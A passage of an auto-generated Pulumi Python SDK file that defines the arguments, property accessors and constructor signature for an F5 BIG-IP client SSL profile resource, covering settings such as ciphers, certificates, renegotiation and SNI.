:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] name: Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renogotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renogotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
if alert_timeout is not None:
pulumi.set(__self__, "alert_timeout", alert_timeout)
if allow_non_ssl is not None:
pulumi.set(__self__, "allow_non_ssl", allow_non_ssl)
if authenticate is not None:
pulumi.set(__self__, "authenticate", authenticate)
if authenticate_depth is not None:
pulumi.set(__self__, "authenticate_depth", authenticate_depth)
if c3d_client_fallback_cert is not None:
pulumi.set(__self__, "c3d_client_fallback_cert", c3d_client_fallback_cert)
if c3d_drop_unknown_ocsp_status is not None:
pulumi.set(__self__, "c3d_drop_unknown_ocsp_status", c3d_drop_unknown_ocsp_status)
if c3d_ocsp is not None:
pulumi.set(__self__, "c3d_ocsp", c3d_ocsp)
if ca_file is not None:
pulumi.set(__self__, "ca_file", ca_file)
if cache_size is not None:
pulumi.set(__self__, "cache_size", cache_size)
if cache_timeout is not None:
pulumi.set(__self__, "cache_timeout", cache_timeout)
if cert is not None:
pulumi.set(__self__, "cert", cert)
if cert_extension_includes is not None:
pulumi.set(__self__, "cert_extension_includes", cert_extension_includes)
if cert_key_chains is not None:
pulumi.set(__self__, "cert_key_chains", cert_key_chains)
if cert_life_span is not None:
pulumi.set(__self__, "cert_life_span", cert_life_span)
if cert_lookup_by_ipaddr_port is not None:
pulumi.set(__self__, "cert_lookup_by_ipaddr_port", cert_lookup_by_ipaddr_port)
if chain is not None:
pulumi.set(__self__, "chain", chain)
if ciphers is not None:
pulumi.set(__self__, "ciphers", ciphers)
if client_cert_ca is not None:
pulumi.set(__self__, "client_cert_ca", client_cert_ca)
if crl_file is not None:
pulumi.set(__self__, "crl_file", crl_file)
if defaults_from is not None:
pulumi.set(__self__, "defaults_from", defaults_from)
if forward_proxy_bypass_default_action is not None:
pulumi.set(__self__, "forward_proxy_bypass_default_action", forward_proxy_bypass_default_action)
if full_path is not None:
pulumi.set(__self__, "full_path", full_path)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if generic_alert is not None:
pulumi.set(__self__, "generic_alert", generic_alert)
if handshake_timeout is not None:
pulumi.set(__self__, "handshake_timeout", handshake_timeout)
if inherit_cert_keychain is not None:
pulumi.set(__self__, "inherit_cert_keychain", inherit_cert_keychain)
if key is not None:
pulumi.set(__self__, "key", key)
if mod_ssl_methods is not None:
pulumi.set(__self__, "mod_ssl_methods", mod_ssl_methods)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if name is not None:
pulumi.set(__self__, "name", name)
if partition is not None:
pulumi.set(__self__, "partition", partition)
if passphrase is not None:
pulumi.set(__self__, "passphrase", passphrase)
if peer_cert_mode is not None:
pulumi.set(__self__, "peer_cert_mode", peer_cert_mode)
if proxy_ca_cert is not None:
pulumi.set(__self__, "proxy_ca_cert", proxy_ca_cert)
if proxy_ca_key is not None:
pulumi.set(__self__, "proxy_ca_key", proxy_ca_key)
if proxy_ca_passphrase is not None:
pulumi.set(__self__, "proxy_ca_passphrase", proxy_ca_passphrase)
if proxy_ssl is not None:
pulumi.set(__self__, "proxy_ssl", proxy_ssl)
if proxy_ssl_passthrough is not None:
pulumi.set(__self__, "proxy_ssl_passthrough", proxy_ssl_passthrough)
if renegotiate_period is not None:
pulumi.set(__self__, "renegotiate_period", renegotiate_period)
if renegotiate_size is not None:
pulumi.set(__self__, "renegotiate_size", renegotiate_size)
if renegotiation is not None:
pulumi.set(__self__, "renegotiation", renegotiation)
if retain_certificate is not None:
pulumi.set(__self__, "retain_certificate", retain_certificate)
if secure_renegotiation is not None:
pulumi.set(__self__, "secure_renegotiation", secure_renegotiation)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if session_mirroring is not None:
pulumi.set(__self__, "session_mirroring", session_mirroring)
if session_ticket is not None:
pulumi.set(__self__, "session_ticket", session_ticket)
if sni_default is not None:
pulumi.set(__self__, "sni_default", sni_default)
if sni_require is not None:
pulumi.set(__self__, "sni_require", sni_require)
if ssl_c3d is not None:
pulumi.set(__self__, "ssl_c3d", ssl_c3d)
if ssl_forward_proxy is not None:
pulumi.set(__self__, "ssl_forward_proxy", ssl_forward_proxy)
if ssl_forward_proxy_bypass is not None:
pulumi.set(__self__, "ssl_forward_proxy_bypass", ssl_forward_proxy_bypass)
if ssl_sign_hash is not None:
pulumi.set(__self__, "ssl_sign_hash", ssl_sign_hash)
if strict_resume is not None:
pulumi.set(__self__, "strict_resume", strict_resume)
if tm_options is not None:
pulumi.set(__self__, "tm_options", tm_options)
if unclean_shutdown is not None:
pulumi.set(__self__, "unclean_shutdown", unclean_shutdown)
@property
@pulumi.getter(name="alertTimeout")
def alert_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Alert time out
"""
return pulumi.get(self, "alert_timeout")
@alert_timeout.setter
def alert_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alert_timeout", value)
@property
@pulumi.getter(name="allowNonSsl")
def allow_non_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "allow_non_ssl")
@allow_non_ssl.setter
def allow_non_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "allow_non_ssl", value)
@property
@pulumi.getter
def authenticate(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
"""
return pulumi.get(self, "authenticate")
@authenticate.setter
def authenticate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authenticate", value)
@property
@pulumi.getter(name="authenticateDepth")
def authenticate_depth(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of certificates to be traversed in a client certificate chain
"""
return pulumi.get(self, "authenticate_depth")
@authenticate_depth.setter
def authenticate_depth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authenticate_depth", value)
@property
@pulumi.getter(name="c3dClientFallbackCert")
def c3d_client_fallback_cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
"""
return pulumi.get(self, "c3d_client_fallback_cert")
@c3d_client_fallback_cert.setter
def c3d_client_fallback_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_client_fallback_cert", value)
@property
@pulumi.getter(name="c3dDropUnknownOcspStatus")
def c3d_drop_unknown_ocsp_status(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
"""
return pulumi.get(self, "c3d_drop_unknown_ocsp_status")
@c3d_drop_unknown_ocsp_status.setter
def c3d_drop_unknown_ocsp_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_drop_unknown_ocsp_status", value)
@property
@pulumi.getter(name="c3dOcsp")
def c3d_ocsp(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
"""
return pulumi.get(self, "c3d_ocsp")
@c3d_ocsp.setter
def c3d_ocsp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_ocsp", value)
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> Optional[pulumi.Input[str]]:
"""
Client certificate file path. Default None.
"""
return pulumi.get(self, "ca_file")
@ca_file.setter
def ca_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_file", value)
@property
@pulumi.getter(name="cacheSize")
def cache_size(self) -> Optional[pulumi.Input[int]]:
"""
Cache size (sessions).
"""
return pulumi.get(self, "cache_size")
@cache_size.setter
def cache_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_size", value)
@property
@pulumi.getter(name="cacheTimeout")
def cache_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Cache time out
"""
return pulumi.get(self, "cache_timeout")
@cache_timeout.setter
def cache_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_timeout", value)
@property
@pulumi.getter
def cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a cert name for use.
"""
return pulumi.get(self, "cert")
@cert.setter
def cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert", value)
@property
@pulumi.getter(name="certExtensionIncludes")
def cert_extension_includes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Cert extension includes for ssl forward proxy
"""
return pulumi.get(self, "cert_extension_includes")
@cert_extension_includes.setter
def cert_extension_includes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cert_extension_includes", value)
@property
@pulumi.getter(name="certKeyChains")
def cert_key_chains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]:
return pulumi.get(self, "cert_key_chains")
@cert_key_chains.setter
def cert_key_chains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]):
pulumi.set(self, "cert_key_chains", value)
@property
@pulumi.getter(name="certLifeSpan")
def cert_life_span(self) -> Optional[pulumi.Input[int]]:
"""
Life span of the certificate in days for ssl forward proxy
"""
return pulumi.get(self, "cert_life_span")
@cert_life_span.setter
def cert_life_span(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cert_life_span", value)
@property
@pulumi.getter(name="certLookupByIpaddrPort")
def cert_lookup_by_ipaddr_port(self) -> Optional[pulumi.Input[str]]:
"""
Cert lookup by ip address and port enabled / disabled
"""
return pulumi.get(self, "cert_lookup_by_ipaddr_port")
@cert_lookup_by_ipaddr_port.setter
def cert_lookup_by_ipaddr_port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert_lookup_by_ipaddr_port", value)
@property
@pulumi.getter
def chain(self) -> Optional[pulumi.Input[str]]:
"""
Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
"""
return pulumi.get(self, "chain")
@chain.setter
def chain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chain", value)
@property
@pulumi.getter
def ciphers(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
"""
return pulumi.get(self, "ciphers")
@ciphers.setter
def ciphers(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ciphers", value)
@property
@pulumi.getter(name="clientCertCa")
def client_cert_ca(self) -> Optional[pulumi.Input[str]]:
"""
client certificate name
"""
return pulumi.get(self, "client_cert_ca")
@client_cert_ca.setter
def client_cert_ca(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert_ca", value)
@property
@pulumi.getter(name="crlFile")
def crl_file(self) -> Optional[pulumi.Input[str]]:
"""
Certificate revocation file name
"""
return pulumi.get(self, "crl_file")
@crl_file.setter
def crl_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "crl_file", value)
@property
@pulumi.getter(name="defaultsFrom")
def defaults_from(self) -> Optional[pulumi.Input[str]]:
"""
Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
"""
return pulumi.get(self, "defaults_from")
@defaults_from.setter
def defaults_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "defaults_from", value)
@property
@pulumi.getter(name="forwardProxyBypassDefaultAction")
def forward_proxy_bypass_default_action(self) -> Optional[pulumi.Input[str]]:
"""
Forward proxy bypass default action. (enabled / disabled)
"""
return pulumi.get(self, "forward_proxy_bypass_default_action")
@forward_proxy_bypass_default_action.setter
def forward_proxy_bypass_default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "forward_proxy_bypass_default_action", value)
@property
@pulumi.getter(name="fullPath")
def full_path(self) -> Optional[pulumi.Input[str]]:
"""
full path of the profile
"""
return pulumi.get(self, "full_path")
@full_path.setter
def full_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "full_path", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
generation
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter(name="genericAlert")
def generic_alert(self) -> Optional[pulumi.Input[str]]:
"""
Generic alerts enabled / disabled.
"""
return pulumi.get(self, "generic_alert")
@generic_alert.setter
def generic_alert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "generic_alert", value)
@property
@pulumi.getter(name="handshakeTimeout")
def handshake_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Handshake time out (seconds)
"""
return pulumi.get(self, "handshake_timeout")
@handshake_timeout.setter
def handshake_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "handshake_timeout", value)
@property
@pulumi.getter(name="inheritCertKeychain")
def inherit_cert_keychain(self) -> Optional[pulumi.Input[str]]:
"""
Inherit cert key chain
"""
return pulumi.get(self, "inherit_cert_keychain")
@inherit_cert_keychain.setter
def inherit_cert_keychain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "inherit_cert_keychain", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Contains a key name
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="modSslMethods")
def mod_ssl_methods(self) -> Optional[pulumi.Input[str]]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mod_ssl_methods")
@mod_ssl_methods.setter
def mod_ssl_methods(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mod_ssl_methods", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[str]]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def partition(self) -> Optional[pulumi.Input[str]]:
"""
name of partition
"""
return pulumi.get(self, "partition")
@partition.setter
def partition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partition", value)
@property
@pulumi.getter
def passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Client Certificate Constrained Delegation CA passphrase
"""
return pulumi.get(self, "passphrase")
@passphrase.setter
def passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "passphrase", value)
@property
@pulumi.getter(name="peerCertMode")
def peer_cert_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
"""
return pulumi.get(self, "peer_cert_mode")
@peer_cert_mode.setter
def peer_cert_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_cert_mode", value)
@property
@pulumi.getter(name="proxyCaCert")
def proxy_ca_cert(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Cert
"""
return pulumi.get(self, "proxy_ca_cert")
@proxy_ca_cert.setter
def proxy_ca_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_cert", value)
@property
@pulumi.getter(name="proxyCaKey")
def proxy_ca_key(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Key
"""
return pulumi.get(self, "proxy_ca_key")
@proxy_ca_key.setter
def proxy_ca_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_key", value)
@property
@pulumi.getter(name="proxyCaPassphrase")
def proxy_ca_passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Passphrase
"""
return pulumi.get(self, "proxy_ca_passphrase")
@proxy_ca_passphrase.setter
def proxy_ca_passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_passphrase", value)
@property
@pulumi.getter(name="proxySsl")
def proxy_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl")
@proxy_ssl.setter
def proxy_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl", value)
@property
@pulumi.getter(name="proxySslPassthrough")
def proxy_ssl_passthrough(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL passthrough enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl_passthrough")
@proxy_ssl_passthrough.setter
def proxy_ssl_passthrough(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl_passthrough", value)
@property
@pulumi.getter(name="renegotiatePeriod")
def renegotiate_period(self) -> Optional[pulumi.Input[str]]:
"""
Renogotiate Period (seconds)
"""
return pulumi.get(self, "renegotiate_period")
@renegotiate_period.setter
def renegotiate_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_period", value)
@property
@pulumi.getter(name="renegotiateSize")
def renegotiate_size(self) -> Optional[pulumi.Input[str]]:
"""
Renogotiate Size
"""
return pulumi.get(self, "renegotiate_size")
@renegotiate_size.setter
def renegotiate_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_size", value)
@property
@pulumi.getter
def renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "renegotiation")
@renegotiation.setter
def renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiation", value)
@property
@pulumi.getter(name="retainCertificate")
def retain_certificate(self) -> Optional[pulumi.Input[str]]:
"""
When `true`, client certificate is retained in SSL session.
"""
return pulumi.get(self, "retain_certificate")
@retain_certificate.setter
def retain_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "retain_certificate", value)
@property
@pulumi.getter(name="secureRenegotiation")
def secure_renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
"""
return pulumi.get(self, "secure_renegotiation")
@secure_renegotiation.setter
def secure_renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secure_renegotiation", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter(name="sessionMirroring")
def session_mirroring(self) -> Optional[pulumi.Input[str]]:
"""
Session Mirroring (enabled / disabled)
"""
return pulumi.get(self, "session_mirroring")
@session_mirroring.setter
def session_mirroring(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_mirroring", value)
@property
@pulumi.getter(name="sessionTicket")
def session_ticket(self) -> Optional[pulumi.Input[str]]:
"""
Session Ticket (enabled / disabled)
"""
return pulumi.get(self, "session_ticket")
@session_ticket.setter
def session_ticket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_ticket", value)
@property
@pulumi.getter(name="sniDefault")
def sni_default(self) -> Optional[pulumi.Input[str]]:
"""
Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
"""
return pulumi.get(self, "sni_default")
@sni_default.setter
def sni_default(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_default", value)
@property
@pulumi.getter(name="sniRequire")
def sni_require(self) -> Optional[pulumi.Input[str]]:
"""
Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "sni_require")
@sni_require.setter
def sni_require(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_require", value)
@property
@pulumi.getter(name="sslC3d")
def ssl_c3d(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
"""
return pulumi.get(self, "ssl_c3d")
@ssl_c3d.setter
def ssl_c3d(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_c3d", value)
@property
@pulumi.getter(name="sslForwardProxy")
def ssl_forward_proxy(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy")
@ssl_forward_proxy.setter
def ssl_forward_proxy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy", value)
@property
@pulumi.getter(name="sslForwardProxyBypass")
def ssl_forward_proxy_bypass(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy_bypass")
@ssl_forward_proxy_bypass.setter
def ssl_forward_proxy_bypass(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy_bypass", value)
@property
@pulumi.getter(name="sslSignHash")
def ssl_sign_hash(self) -> Optional[pulumi.Input[str]]:
"""
SSL sign hash (any, sha1, sha256, sha384)
"""
return pulumi.get(self, "ssl_sign_hash")
@ssl_sign_hash.setter
def ssl_sign_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_sign_hash", value)
@property
@pulumi.getter(name="strictResume")
def strict_resume(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "strict_resume")
@strict_resume.setter
def strict_resume(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strict_resume", value)
@property
@pulumi.getter(name="tmOptions")
def tm_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
"""
return pulumi.get(self, "tm_options")
@tm_options.setter
def tm_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tm_options", value)
@property
@pulumi.getter(name="uncleanShutdown")
def unclean_shutdown(self) -> Optional[pulumi.Input[str]]:
"""
Unclean Shutdown (enabled / disabled)
"""
return pulumi.get(self, "unclean_shutdown")
@unclean_shutdown.setter
def unclean_shutdown(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unclean_shutdown", value)
class ProfileClientSsl(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProfileClientSslCertKeyChainArgs']]]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
